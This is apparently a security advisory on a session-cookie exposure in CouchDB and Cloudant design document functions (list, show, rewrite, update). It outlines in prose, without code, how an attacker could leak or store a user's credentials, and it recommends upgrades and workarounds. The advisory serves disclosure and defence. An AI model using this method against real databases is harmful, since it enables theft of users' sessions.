Mike Rhodes

**Name of the Vulnerable Software and Affected Versions** Apache CouchDB versions prior to 3.3.3 IBM Cloudant versions prior to 8413 **Description** Design document functions that receive a user HTTP request object may expose authorization or session cookie headers of the user who accesses the document. These design document functions include `list`, `show`, `rewrite`, and `update`. An attacker can leak the session component using an HTML-like output, insert the session as an external resource, or store the credential in a local document with an `update` function. For the attack to succeed, the attacker must be able to insert the design documents into the database and then manipulate a user to access a function from that design document. **Recommendations** For Apache CouchDB versions prior to 3.3.3, upgrade to version 3.3.3 or later. For IBM Cloudant versions prior to 8413, upgrade to version 8413 or later. As a temporary workaround, consider avoiding the use of design documents from untrusted sources that may attempt to access or manipulate request object headers. Restrict access to the vulnerable design document functions `list`, `show`, `rewrite`, and `update` to minimize the risk of exploitation.